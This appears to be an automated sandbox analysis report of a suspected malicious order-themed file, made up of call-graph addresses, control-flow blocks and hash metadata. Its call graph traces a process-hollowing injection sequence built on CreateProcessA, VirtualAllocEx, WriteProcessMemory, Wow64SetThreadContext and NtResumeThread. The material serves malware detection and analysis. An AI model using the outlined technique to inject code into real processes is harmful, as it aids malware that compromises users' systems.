61483 6ff40c8 61479->61483 61487 6ff40b8 61479->61487 61480 6f276b4 61484 6ff40dd 61483->61484 61486 6ff40f3 61484->61486 61491 6ff4616 61484->61491 61486->61480 61488 6ff40c4 61487->61488 61489 6ff40f3 61488->61489 61490 6ff4616 10 API calls 61488->61490 61489->61480 61490->61489 61492 6ff4620 61491->61492 61496 6ff58c1 61492->61496 61501 6ff58d0 61492->61501 61493 6ff456d 61493->61486 61497 6ff58d0 61496->61497 61506 6ff5920 61497->61506 61510 6ff5910 61497->61510 61498 6ff5907 61498->61493 61502 6ff58e5 61501->61502 61504 6ff5920 10 API calls 61502->61504 61505 6ff5910 10 API calls 61502->61505 61503 6ff5907 61503->61493 61504->61503 61505->61503 61507 6ff594d 61506->61507 61508 6ff59f9 61507->61508 61514 6ff6078 61507->61514 61508->61498 61512 6ff5920 61510->61512 61511 6ff59f9 61511->61498 61512->61511 61513 6ff6078 10 API calls 61512->61513 61513->61512 61515 6ff609d 61514->61515 61563 6ff6b7c 61515->61563 61568 6ff6181 61515->61568 61573 6ff6243 61515->61573 61578 6ff6c44 61515->61578 61583 6ff6f0c 61515->61583 61588 6ff67cc 61515->61588 61593 6ff6f8d 61515->61593 61598 6ff694f 61515->61598 61603 6ff6d52 61515->61603 61608 6ff61d3 61515->61608 61613 6ff6253 61515->61613 61618 6ff6655 61515->61618 61623 6ff6ed7 61515->61623 61628 6ff6b99 61515->61628 61636 6ff63d9 61515->61636 61641 6ff649a 61515->61641 61646 6ff6c9b 61515->61646 61651 6ff6e5d 61515->61651 61655 6ff631e 61515->61655 61660 6ff62de 61515->61660 61665 6ff6a9f 61515->61665 61670 6ff6de0 61515->61670 61675 6ff71a3 61515->61675 61681 6ff64e4 61515->61681 61686 6ff70a5 61515->61686 61691 6ff7265 61515->61691 61696 6ff6526 61515->61696 61701 6ff6729 61515->61701 61706 6ff69ab 61515->61706 61711 6ff652b 61515->61711 61716 6ff686e 61515->61716 61721 6ff61ae 61515->61721 61726 6ff68b0 61515->61726 61731 6ff6770 61515->61731 61736 6ff6873 61515->61736 61741 6ff6cf4 61515->61741 61745 6ff6b34 61515->61745 61750 6ff6474 61515->61750 61755 6ff6d35 61515->61755 61760 6ff6ff5 61515->61760 61768 6ff68f6 61515->61768 61773 6ff65b9 61515->61773 61782 6ff6afa 61515->61782 61787 6ff68fb 61515->61787 61792 6ff65fb 61515->61792 61797 6ff673b 61515->61797 61564 6ff61ba 61563->61564 61565 6ff72de 61564->61565 61802 6f18200 61564->61802 61806 6f18208 61564->61806 61569 6ff6192 61568->61569 61570 6ff72de 61569->61570 61571 6f18200 WriteProcessMemory 61569->61571 61572 6f18208 WriteProcessMemory 61569->61572 61571->61569 61572->61569 61574 6ff61ba 61573->61574 61575 6ff72de 61574->61575 61576 6f18200 WriteProcessMemory 61574->61576 61577 6f18208 WriteProcessMemory 61574->61577 61576->61574 61577->61574 61580 6ff61ba 61578->61580 61579 6ff72de 61580->61579 61581 6f18200 WriteProcessMemory 61580->61581 61582 6f18208 WriteProcessMemory 61580->61582 61581->61580 61582->61580 61584 6ff7200 61583->61584 61810 6f180b8 61584->61810 61815 6f18108 61584->61815 61585 6ff7246 61589 6ff61ba 61588->61589 61590 6ff72de 61589->61590 61591 6f18200 WriteProcessMemory 61589->61591 61592 6f18208 WriteProcessMemory 61589->61592 61591->61589 61592->61589 61594 6ff6fa5 61593->61594 61596 6f18200 WriteProcessMemory 61594->61596 61597 6f18208 WriteProcessMemory 61594->61597 61595 6ff6fd2 61596->61595 61597->61595 61599 6ff61ba 61598->61599 61600 6ff72de 61599->61600 61601 6f18200 WriteProcessMemory 61599->61601 61602 6f18208 WriteProcessMemory 61599->61602 61601->61599 61602->61599 61604 6ff61ba 61603->61604 61605 6ff72de 61604->61605 61606 6f18200 WriteProcessMemory 61604->61606 61607 6f18208 WriteProcessMemory 61604->61607 61606->61604 61607->61604 61609 6ff61ba 61608->61609 61610 6ff72de 61609->61610 61611 6f18200 WriteProcessMemory 61609->61611 61612 6f18208 WriteProcessMemory 61609->61612 61611->61609 61612->61609 61614 6ff61ba 61613->61614 61615 6ff72de 61614->61615 61616 6f18200 WriteProcessMemory 61614->61616 61617 6f18208 WriteProcessMemory 61614->61617 61616->61614 61617->61614 61620 6ff61ba 61618->61620 61619 6ff72de 61620->61618 61620->61619 61621 6f18200 WriteProcessMemory 61620->61621 61622 6f18208 WriteProcessMemory 61620->61622 61621->61620 61622->61620 61624 6ff6ee1 61623->61624 61626 6f180b8 VirtualAllocEx 61624->61626 61627 6f18108 VirtualAllocEx 61624->61627 61625 6ff7246 61626->61625 61627->61625 61629 6ff6bb9 61628->61629 61632 6f18200 WriteProcessMemory 61629->61632 61633 6f18208 WriteProcessMemory 61629->61633 61630 6ff61ba 61631 6ff60bf 61630->61631 61634 6f18200 WriteProcessMemory 61630->61634 61635 6f18208 WriteProcessMemory 61630->61635 61631->61507 61632->61630 61633->61630 61634->61630 61635->61630 61637 6ff61ba 61636->61637 61638 6ff72de 61637->61638 61639 6f18200 WriteProcessMemory 61637->61639 61640 6f18208 WriteProcessMemory 61637->61640 61639->61637 61640->61637 61642 6ff7200 61641->61642 61644 6f180b8 VirtualAllocEx 61642->61644 61645 6f18108 VirtualAllocEx 61642->61645 61643 6ff7246 61644->61643 61645->61643 61647 6ff61ba 61646->61647 61648 6ff72de 61647->61648 61649 6f18200 WriteProcessMemory 61647->61649 61650 6f18208 WriteProcessMemory 61647->61650 61649->61647 61650->61647 61819 6ff8ed8 61651->61819 61824 6ff8ec8 61651->61824 61652 6ff6e75 61656 6ff61ba 61655->61656 61657 6ff72de 61656->61657 61658 6f18200 WriteProcessMemory 61656->61658 61659 6f18208 WriteProcessMemory 61656->61659 61658->61656 61659->61656 61661 6ff61ba 61660->61661 61662 6ff72de 61661->61662 61663 6f18200 WriteProcessMemory 61661->61663 61664 6f18208 WriteProcessMemory 61661->61664 61663->61661 61664->61661 61666 6ff61ba 61665->61666 61667 6ff72de 61666->61667 61668 6f18200 WriteProcessMemory 61666->61668 61669 6f18208 WriteProcessMemory 61666->61669 61668->61666 61669->61666 61671 6ff61ba 61670->61671 61672 6ff72de 61671->61672 61673 6f18200 WriteProcessMemory 61671->61673 61674 6f18208 WriteProcessMemory 61671->61674 61673->61671 61674->61671 61676 6ff71ad 61675->61676 61677 6ff6cf3 61675->61677 61837 6ff8df8 61677->61837 61842 6ff8deb 61677->61842 61678 6ff6d0c 61682 6ff61ba 61681->61682 61683 6ff72de 61682->61683 61684 6f18200 WriteProcessMemory 61682->61684 61685 6f18208 WriteProcessMemory 61682->61685 61684->61682 61685->61682 61687 6ff61ba 61686->61687 61688 6ff72de 61687->61688 61689 6f18200 WriteProcessMemory 61687->61689 61690 6f18208 WriteProcessMemory 61687->61690 61689->61687 61690->61687 61692 6ff61ba 61691->61692 61693 6ff72de 61692->61693 61694 6f18200 WriteProcessMemory 61692->61694 61695 6f18208 WriteProcessMemory 61692->61695 61694->61692 61695->61692 61697 6ff61ba 61696->61697 61698 6ff72de 61697->61698 61699 6f18200 WriteProcessMemory 61697->61699 61700 6f18208 WriteProcessMemory 61697->61700 61699->61697 61700->61697 61702 6ff61ba 61701->61702 61703 6ff72de 61702->61703 61704 6f18200 WriteProcessMemory 61702->61704 61705 6f18208 WriteProcessMemory 61702->61705 61704->61702 61705->61702 61707 6ff61ba 61706->61707 61708 6ff72de 61707->61708 61709 6f18200 WriteProcessMemory 61707->61709 61710 6f18208 WriteProcessMemory 61707->61710 61709->61707 61710->61707 61712 6ff61ba 61711->61712 61713 6ff72de 61712->61713 61714 6f18200 WriteProcessMemory 61712->61714 61715 6f18208 WriteProcessMemory 61712->61715 61714->61712 61715->61712 61717 6ff7146 61716->61717 61847 6f183b0 61717->61847 61851 6f183b8 61717->61851 61718 6ff7161 61722 6ff61ba 61721->61722 61723 6ff72de 61722->61723 61724 6f18200 WriteProcessMemory 61722->61724 61725 6f18208 WriteProcessMemory 61722->61725 61724->61722 61725->61722 61727 6ff61ba 61726->61727 61728 6ff72de 61727->61728 61729 6f18200 WriteProcessMemory 61727->61729 61730 6f18208 WriteProcessMemory 61727->61730 61729->61727 61730->61727 61732 6ff61ba 61731->61732 61733 6ff72de 61732->61733 61734 6f18200 WriteProcessMemory 61732->61734 61735 6f18208 WriteProcessMemory 61732->61735 61734->61732 61735->61732 61737 6ff61ba 61736->61737 61738 6ff72de 61737->61738 61739 6f18200 WriteProcessMemory 61737->61739 61740 6f18208 WriteProcessMemory 61737->61740 61739->61737 61740->61737 61743 6ff8deb 2 API calls 61741->61743 61744 6ff8df8 2 API calls 61741->61744 61742 6ff6d0c 61743->61742 61744->61742 61746 6ff61ba 61745->61746 61747 6ff72de 61746->61747 61748 6f18200 WriteProcessMemory 61746->61748 61749 6f18208 WriteProcessMemory 61746->61749 61748->61746 61749->61746 61751 6ff61ba 61750->61751 61752 6ff72de 61751->61752 61753 6f18200 WriteProcessMemory 61751->61753 61754 6f18208 WriteProcessMemory 61751->61754 61753->61751 61754->61751 61756 6ff61ba 61755->61756 61757 6ff72de 61756->61757 61758 6f18200 WriteProcessMemory 61756->61758 61759 6f18208 WriteProcessMemory 61756->61759 61758->61756 61759->61756 61761 6ff700d 61760->61761 61855 6ff7789 61761->61855 61861 6ff7798 61761->61861 61762 6ff61ba 61763 6ff72de 61762->61763 61764 6f18200 WriteProcessMemory 61762->61764 61765 6f18208 WriteProcessMemory 61762->61765 61764->61762 61765->61762 61769 6ff61ba 61768->61769 61770 6ff72de 61769->61770 61771 6f18200 WriteProcessMemory 61769->61771 61772 6f18208 WriteProcessMemory 61769->61772 61771->61769 61772->61769 61774 6ff61ba 61773->61774 61775 6ff7120 61773->61775 61777 6ff72de 61774->61777 61780 6f18200 WriteProcessMemory 61774->61780 61781 6f18208 WriteProcessMemory 61774->61781 61778 6f183b0 NtResumeThread 61775->61778 61779 6f183b8 NtResumeThread 61775->61779 61776 6ff7161 61778->61776 61779->61776 61780->61774 61781->61774 61783 6ff61ba 61782->61783 61784 6ff72de 61783->61784 61785 6f18200 WriteProcessMemory 61783->61785 61786 6f18208 WriteProcessMemory 61783->61786 61785->61783 61786->61783 61788 6ff61ba 61787->61788 61789 6ff72de 61788->61789 61790 6f18200 WriteProcessMemory 61788->61790 61791 6f18208 WriteProcessMemory 61788->61791 61790->61788 61791->61788 61793 6ff61ba 61792->61793 61794 6ff72de 61793->61794 61795 6f18200 WriteProcessMemory 61793->61795 61796 6f18208 WriteProcessMemory 61793->61796 61795->61793 61796->61793 61798 6ff61ba 61797->61798 61799 6ff72de 61798->61799 61800 6f18200 WriteProcessMemory 61798->61800 61801 6f18208 WriteProcessMemory 61798->61801 61800->61798 61801->61798 61803 6f18208 WriteProcessMemory 61802->61803 61805 6f182a7 61803->61805 61805->61564 61807 6f18250 WriteProcessMemory 61806->61807 61809 6f182a7 61807->61809 61809->61564 61811 6f180f8 VirtualAllocEx 61810->61811 61812 6f180c6 61810->61812 61814 6f18185 61811->61814 61812->61585 61814->61585 61816 6f18148 VirtualAllocEx 61815->61816 61818 6f18185 61816->61818 61818->61585 61820 6ff8eed 61819->61820 61829 6f17ce1 61820->61829 61833 6f17ce8 61820->61833 61821 6ff8f06 61821->61652 61825 6ff8ed8 61824->61825 61827 6f17ce1 Wow64SetThreadContext 61825->61827 61828 6f17ce8 Wow64SetThreadContext 61825->61828 61826 6ff8f06 61826->61652 61827->61826 61828->61826 61830 6f17ce8 Wow64SetThreadContext 61829->61830 61832 6f17d75 61830->61832 61832->61821 61834 6f17d2d Wow64SetThreadContext 61833->61834 61836 6f17d75 61834->61836 61836->61821 61838 6ff8e0d 61837->61838 61840 6f17ce1 Wow64SetThreadContext 61838->61840 61841 6f17ce8 Wow64SetThreadContext 61838->61841 61839 6ff8e26 61839->61678 61840->61839 61841->61839 61843 6ff8df8 61842->61843 61845 6f17ce1 Wow64SetThreadContext 61843->61845 61846 6f17ce8 Wow64SetThreadContext 61843->61846 61844 6ff8e26 61844->61678 61845->61844 61846->61844 61848 6f183b4 NtResumeThread 61847->61848 61850 6f18435 61848->61850 61850->61718 61852 6f183ba NtResumeThread 61851->61852 61854 6f18435 61852->61854 61854->61718 61856 6ff7798 61855->61856 61857 6ff77d1 61856->61857 61867 6ff797c 61856->61867 61872 6ff7b04 61856->61872 61877 6ff791b 61856->61877 61857->61762 61862 6ff77af 61861->61862 61863 6ff77d1 61862->61863 61864 6ff797c 2 API calls 61862->61864 61865 6ff791b 2 API calls 61862->61865 61866 6ff7b04 2 API calls 61862->61866 61863->61762 61864->61863 61865->61863 61866->61863 61868 6ff79a4 61867->61868 61869 6ff788f 61868->61869 61882 6f179e8 61868->61882 61886 6f179dd 61868->61886 61873 6ff7b1d 61872->61873 61875 6f179e8 CreateProcessA 61873->61875 61876 6f179dd CreateProcessA 61873->61876 61874 6ff788f 61875->61874 61876->61874 61878 6ff7929 61877->61878 61879 6ff788f 61878->61879 61880 6f179e8 CreateProcessA 61878->61880 61881 6f179dd CreateProcessA 61878->61881 61880->61879 61881->61879 61883 6f17a4c CreateProcessA 61882->61883 61885 6f17bd4 61883->61885 61887 6f179e4 CreateProcessA 61886->61887 61889 6f17bd4 61887->61889 61899 6f277b8 61900 6f277c2 61899->61900 61904 6f3ed30 61900->61904 61909 6f3ed2b 61900->61909 61901 6f27800 61905 6f3ed45 61904->61905 61914 6f3ee03 61905->61914 61919 6f3ef10 61905->61919 61906 6f3ed5b 61906->61901 61910 6f3ed30 61909->61910 61912 6f3ee03 2 API calls 61910->61912 61913 6f3ef10 2 API calls 61910->61913 61911 6f3ed5b 61911->61901 61912->61911 61913->61911 61915 6f3ee25 61914->61915 61916 6f3ef72 61915->61916 61917 6f185f0 VirtualProtect 61915->61917 61918 6f185f8 VirtualProtect 61915->61918 61916->61906 61917->61915 61918->61915 61920 6f3ef16 61919->61920 61921 6f3ef72 61920->61921 61922 6f185f8 VirtualProtect 61920->61922 61923 6f185f0 VirtualProtect 61920->61923 61921->61906 61922->61920 61923->61920 61890 30ba830 61891 30ba831 61890->61891 61894 30ba928 61891->61894 61892 30ba83f 61895 30ba95c 61894->61895 61896 30ba939 61894->61896 61895->61892 61896->61895 61897 30bab60 GetModuleHandleW 61896->61897 61898 30bab8d 61897->61898 61898->61892 61924 30b4ac0 61927 30b4670 61924->61927 61926 30b4ace 61928 30b467b 61927->61928 61931 30b4804 61928->61931 61930 30b4bfd 61930->61926 61932 30b480f 61931->61932 61935 30b4834 61932->61935 61934 30b4cda 61934->61930 61936 30b483f 61935->61936 61939 30b4864 61936->61939 61938 30b4ddc 61938->61934 61940 30b486f 61939->61940 61946 30b7930 61940->61946 61942 30b7e19 61942->61938 61943 30b7bf0 61943->61942 61951 30bc8f0 61943->61951 61956 30bc8e1 61943->61956 61947 30b793b 61946->61947 61948 30b93da 61947->61948 61961 30b9429 61947->61961 61965 30b9438 61947->61965 61948->61943 61953 30bc911 61951->61953 61952 30bc935 61952->61942 61953->61952 61969 30bcbb0 61953->61969 61973 30bcbc0 61953->61973 61957 30bc8f0 61956->61957 61958 30bc935 61957->61958 61959 30bcbb0 2 API calls 61957->61959 61960 30bcbc0 2 API calls 61957->61960 61958->61942 61959->61958 61960->61958 61962 30b942c 61961->61962 61963 30b9486 KiUserCallbackDispatcher 61962->61963 61964 30b94b0 61962->61964 61963->61964 61964->61948 61966 30b9439 61965->61966 61967 30b94b0 61966->61967 61968 30b9486 KiUserCallbackDispatcher 61966->61968 61967->61948 61968->61967 61970 30bcbc0 61969->61970 61972 30bcc07 61970->61972 61977 30baea8 61970->61977 61972->61952 61974 30bcbc5 61973->61974 61975 30baea8 2 API calls 61974->61975 61976 30bcc07 61974->61976 61975->61976 61976->61952 61978 30baead 61977->61978 61980 30bd920 61978->61980 61981 30bd4e0 61978->61981 61980->61980 61982 30bd4eb 61981->61982 61983 30b4864 2 API calls 61982->61983 61984 30bd98f 61983->61984 61984->61980 62002 6f2760e 62003 6f2762d 62002->62003 62005 6ff40c8 10 API calls 62003->62005 62006 6ff40b8 10 API calls 62003->62006 62004 6f276b4 62005->62004 62006->62004 62007 6f2780e 62008 6f27818 62007->62008 62012 6f1a158 62008->62012 62019 6f1a148 62008->62019 62009 6f27856 62013 6f1a16d 62012->62013 62026 6f1a228 62013->62026 62031 6f1a669 62013->62031 62036 6f1a188 62013->62036 62041 6f1a198 62013->62041 62014 6f1a183 62014->62009 62020 6f1a14c 62019->62020 62022 6f1a669 2 API calls 62020->62022 62023 6f1a228 2 API calls 62020->62023 62024 6f1a198 2 API calls 62020->62024 62025 6f1a188 2 API calls 62020->62025 62021 6f1a183 62021->62009 62022->62021 62023->62021 62024->62021 62025->62021 62028 6f1a212 62026->62028 62027 6f1a2b6 62027->62014 62028->62027 62029 6f185f0 VirtualProtect 62028->62029 62030 6f185f8 VirtualProtect 62028->62030 62029->62028 62030->62028 62032 6f1a212 62031->62032 62033 6f1a2b6 62031->62033 62032->62033 62034 6f185f0 VirtualProtect 62032->62034 62035 6f185f8 VirtualProtect 62032->62035 62033->62014 62034->62032 62035->62032 62038 6f1a194 62036->62038 62037 6f1a2b6 62037->62014 62038->62037 62039 6f185f0 VirtualProtect 62038->62039 62040 6f185f8 VirtualProtect 62038->62040 62039->62038 62040->62038 62042 6f1a1c5 62041->62042 62043 6f1a2b6 62042->62043 62044 6f185f0 VirtualProtect 62042->62044 62045 6f185f8 VirtualProtect 62042->62045 62043->62014 62044->62042 62045->62042
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 2ff68f8da6c61fc3544bfc531d0f273e40f67a4b3cf5023dfa438fbd644e8774
                                                              • Instruction ID: b3ffea7c489a805ab0d1b2a92f634e6449c27164dff8d7bbaca27e58f0697820
                                                              • Opcode Fuzzy Hash: 2ff68f8da6c61fc3544bfc531d0f273e40f67a4b3cf5023dfa438fbd644e8774
                                                              • Instruction Fuzzy Hash: 6CB2E374A00229CFDB94CFA8C994BADB7B6BF88700F158599E505AB3A5DB70DC81CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 362 6dd5d62-6dd5db6 364 6dd5dbd-6dd5ec9 362->364 365 6dd5db8 362->365 368 6dd5eed-6dd5ef9 364->368 369 6dd5ecb-6dd5ee1 364->369 365->364 370 6dd5efb 368->370 371 6dd5f00-6dd5f05 368->371 600 6dd5ee7 call 6dd7f98 369->600 601 6dd5ee7 call 6dd7fa8 369->601 370->371 372 6dd5f3d-6dd5f5d 371->372 373 6dd5f07-6dd5f13 371->373 381 6dd5f5f 372->381 382 6dd5f64-6dd618d 372->382 375 6dd5f1a-6dd5f38 373->375 376 6dd5f15 373->376 377 6dd7161-6dd7167 375->377 376->375 379 6dd7169 377->379 380 6dd7171 377->380 379->380 381->382 402 6dd67fa-6dd6806 382->402 403 6dd680c-6dd6844 402->403 404 6dd6192-6dd619e 402->404 412 6dd691e-6dd6924 403->412 405 6dd61a5-6dd6262 404->405 406 6dd61a0 404->406 423 6dd6264-6dd627d 405->423 424 6dd6283-6dd62d5 405->424 406->405 414 6dd6849-6dd68c6 412->414 415 6dd692a-6dd6962 412->415 433 6dd68f9-6dd691b 414->433 434 6dd68c8-6dd68cc 414->434 427 6dd6cac-6dd6cb2 415->427 423->424 446 6dd62e4-6dd6331 424->446 447 6dd62d7-6dd62df 424->447 429 6dd6cb8-6dd6d00 427->429 430 6dd6967-6dd6a03 427->430 440 6dd6d7b-6dd6dc6 429->440 441 6dd6d02-6dd6d75 429->441 463 6dd6a0f-6dd6b69 430->463 433->412 434->433 435 6dd68ce-6dd68f6 434->435 435->433 464 6dd712b-6dd7131 440->464 441->440 461 6dd6340-6dd638d 446->461 462 6dd6333-6dd633b 446->462 449 6dd67eb-6dd67f7 447->449 449->402 478 6dd639c-6dd63e9 461->478 479 6dd638f-6dd6397 461->479 462->449 526 6dd6b6f-6dd6bef 463->526 527 6dd6bf4-6dd6bf8 463->527 466 6dd6dcb-6dd6e24 464->466 467 6dd7137-6dd715f 464->467 481 6dd6e4c-6dd6e58 466->481 482 6dd6e26-6dd6e41 466->482 467->377 506 6dd63f8-6dd6445 478->506 507 6dd63eb-6dd63f3 478->507 479->449 483 6dd6e5f-6dd6e6b 481->483 484 6dd6e5a 481->484 482->481 488 6dd6e6d-6dd6e79 483->488 489 6dd6e7e-6dd6e8d 483->489 484->483 491 6dd7112-6dd7128 488->491 492 6dd6e8f 489->492 493 6dd6e96-6dd70f3 489->493 491->464 492->493 496 6dd6e9c-6dd6f05 492->496 497 6dd6f5e-6dd6f9e 492->497 498 6dd6fe8-6dd7050 492->498 499 6dd6f0a-6dd6f59 492->499 500 6dd6fa3-6dd6fe3 492->500 521 6dd70fe-6dd710a 493->521 496->521 497->521 528 6dd70c4-6dd70ca 498->528 499->521 500->521 534 6dd6454-6dd64a1 506->534 535 6dd6447-6dd644f 506->535 507->449 521->491 549 6dd6c93-6dd6ca9 526->549 529 6dd6bfa-6dd6c53 527->529 530 6dd6c55-6dd6c92 527->530 531 6dd70cc-6dd70d6 528->531 532 6dd7052-6dd70b0 528->532 529->549 530->549 531->521 546 6dd70b7-6dd70c1 532->546 547 6dd70b2 532->547 553 6dd64b0-6dd64fd 534->553 554 6dd64a3-6dd64ab 534->554 535->449 546->528 547->546 549->427 558 6dd650c-6dd6559 553->558 559 6dd64ff-6dd6507 553->559 554->449 563 6dd6568-6dd65b5 558->563 564 6dd655b-6dd6563 558->564 559->449 568 6dd65c4-6dd6611 563->568 569 6dd65b7-6dd65bf 563->569 564->449 573 6dd6620-6dd666d 568->573 574 6dd6613-6dd661b 568->574 569->449 578 6dd667c-6dd66c9 573->578 579 6dd666f-6dd6677 573->579 574->449 583 6dd66d8-6dd6725 578->583 584 6dd66cb-6dd66d3 578->584 579->449 588 6dd6734-6dd6781 583->588 589 6dd6727-6dd672f 583->589 584->449 593 6dd678d-6dd67da 588->593 594 6dd6783-6dd678b 588->594 589->449 598 6dd67dc-6dd67e4 593->598 599 6dd67e6-6dd67e8 593->599 594->449 598->449 599->449 600->368 601->368
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2
                                                              • API String ID: 0-450215437
                                                              • Opcode ID: da9c90c88d2fd6236d8c0c575b7a7328e6f26d8c801a579d0791189c12764fda
                                                              • Instruction ID: 4af04bac7fc60fc3dcc1bb37e28ce82754d5fd1d61dbb91ae8a375d992bd269d
                                                              • Opcode Fuzzy Hash: da9c90c88d2fd6236d8c0c575b7a7328e6f26d8c801a579d0791189c12764fda
                                                              • Instruction Fuzzy Hash: 05C2A0B4E002298FDB65DF68D884B9DBBB6FB89300F1081E9D509AB355DB309E85CF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 602 6f142c0-6f142e1 603 6f142e3 602->603 604 6f142e8-6f14380 call 6f14bf0 602->604 603->604 608 6f14386-6f143bd 604->608 610 6f143cc 608->610 611 6f143bf-6f143ca 608->611 612 6f143d6-6f144a8 610->612 611->612 621 6f144ba-6f144e5 612->621 622 6f144aa-6f144b0 612->622 623 6f14b52-6f14b6e 621->623 622->621 624 6f14b74-6f14b8f 623->624 625 6f144ea-6f14613 623->625 634 6f14625-6f14774 625->634 635 6f14615-6f1461b 625->635 643 6f14776-6f1477a 634->643 644 6f147cd-6f147d4 634->644 635->634 646 6f14782-6f147c8 643->646 647 6f1477c-6f1477d 643->647 645 6f1497f-6f1499b 644->645 649 6f149a1-6f149c5 645->649 650 6f147d9-6f148c7 645->650 648 6f14a0f-6f14a5e 646->648 647->648 664 6f14a70-6f14abb 648->664 665 6f14a60-6f14a66 648->665 655 6f149c7-6f14a09 649->655 656 6f14a0c-6f14a0d 649->656 674 6f1497b-6f1497c 650->674 675 6f148cd-6f14978 650->675 655->656 656->648 666 6f14b34-6f14b4f 664->666 667 6f14abd-6f14b33 664->667 665->664 666->623 667->666 674->645 675->674
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8
                                                              • API String ID: 0-4194326291
                                                              • Opcode ID: 58d8e492cce5cb2c0aef2c4487d90227374ee334972ea0b912edd20ab6690509
                                                              • Instruction ID: 8b1f3d5b22a8c73050308a8f67c953939e693e3bc18f5cf5522725eb7743696f
                                                              • Opcode Fuzzy Hash: 58d8e492cce5cb2c0aef2c4487d90227374ee334972ea0b912edd20ab6690509
                                                              • Instruction Fuzzy Hash: B142C171D006298BDB64DF69C850BD9B7B2BF89310F1486EAD50DBB251DB30AE85CF90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 65840fc4a84c086d6cfa366d5e5fce81a39891afd493cb3fc22acd1d4711953a
                                                              • Instruction ID: b9e7468a3439157f9b19203a3fe07606eb464551456c6eb77e5b3cb7525c199f
                                                              • Opcode Fuzzy Hash: 65840fc4a84c086d6cfa366d5e5fce81a39891afd493cb3fc22acd1d4711953a
                                                              • Instruction Fuzzy Hash: BF22E574E00229CFEBA4CFA4C994BADB7B2BF48700F148199D509AB3A5DB719D81CF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1237 6f28690-6f286bb 1238 6f286c2-6f2870f 1237->1238 1239 6f286bd 1237->1239 1242 6f28712-6f28718 1238->1242 1239->1238 1243 6f28721-6f28722 1242->1243 1244 6f2871a 1242->1244 1254 6f2875f-6f2876b 1243->1254 1244->1243 1245 6f28960-6f289a5 1244->1245 1246 6f287b7-6f287e6 1244->1246 1247 6f28724-6f28755 1244->1247 1248 6f28aa4-6f28ab8 1244->1248 1249 6f28a64-6f28a9a 1244->1249 1250 6f28aba-6f28ad7 1244->1250 1251 6f288fb-6f2895b call 6f28040 1244->1251 1252 6f287e8-6f2885d call 6f28040 1244->1252 1253 6f2886e-6f288e8 1244->1253 1244->1254 1255 6f2876c-6f28798 1244->1255 1302 6f289a7-6f289ad 1245->1302 1303 6f289af-6f289b4 1245->1303 1272 6f287a2-6f287a8 1246->1272 1247->1242 1285 6f28757-6f2875d 1247->1285 1258 6f28a52-6f28a58 1248->1258 1249->1258 1284 6f28a9c-6f28aa2 1249->1284 1269 6f28b3b 1250->1269 1270 6f28ad9-6f28aed 1250->1270 1251->1272 1252->1272 1322 6f28863-6f28869 1252->1322 1253->1272 1325 6f288ee-6f288f6 1253->1325 1255->1272 1273 6f2879a-6f287a0 1255->1273 1262 6f28a61-6f28a62 1258->1262 1263 6f28a5a 1258->1263 1262->1248 1263->1248 1263->1249 1263->1250 1263->1262 1274 6f28bb3 1263->1274 1275 6f28bb0-6f28bb1 1263->1275 1276 6f28b3a 1263->1276 1277 6f28b9a-6f28bae 1263->1277 1278 6f28c1b-6f28c1c 1263->1278 1279 6f28c5b 1263->1279 1280 6f28c1e-6f28c4c 1263->1280 1281 6f28d04-6f28d05 1263->1281 1282 6f28cca-6f28cf5 1263->1282 1283 6f28b09-6f28b2e 1263->1283 1295 6f28b88-6f28b8e 1269->1295 1286 6f28af7-6f28afd 1270->1286 1287 6f28aef-6f28af5 1270->1287 1290 6f287b1-6f287b2 1272->1290 1291 6f287aa 1272->1291 1273->1272 1297 6f28bb4 1274->1297 1275->1297 1276->1269 1277->1295 1299 6f28c5c 1278->1299 1279->1299 1316 6f28c06-6f28c0f 1280->1316 1318 6f28c4e-6f28c59 1280->1318 1314 6f28d06 1281->1314 1309 6f28cf7-6f28d02 1282->1309 1310 6f28cb5-6f28cbe 1282->1310 1283->1286 1311 6f28b30-6f28b38 1283->1311 1284->1258 1285->1242 1288 6f28b06-6f28b07 1286->1288 1289 6f28aff 1286->1289 1287->1286 1288->1283 1289->1274 1289->1275 1289->1276 1289->1277 1289->1278 1289->1279 1289->1280 1289->1281 1289->1282 1289->1283 1289->1288 1290->1251 1291->1245 1291->1246 1291->1248 1291->1249 1291->1250 1291->1251 1291->1252 1291->1253 1291->1276 1291->1283 1291->1290 1305 6f28b90 1295->1305 1306 6f28b97-6f28b98 1295->1306 1297->1316 1299->1310 1302->1303 1312 6f289b6-6f289b7 1303->1312 1313 6f289b9-6f28a07 1303->1313 1305->1274 1305->1275 1305->1277 1305->1278 1305->1279 1305->1280 1305->1281 1305->1282 1305->1306 1306->1277 1309->1310 1320 6f28cc0 1310->1320 1321 6f28cc7-6f28cc8 1310->1321 1311->1286 1312->1313 1328 6f28a11-6f28a16 1313->1328 1329 6f28a09-6f28a0f 1313->1329 1314->1314 1323 6f28c11 1316->1323 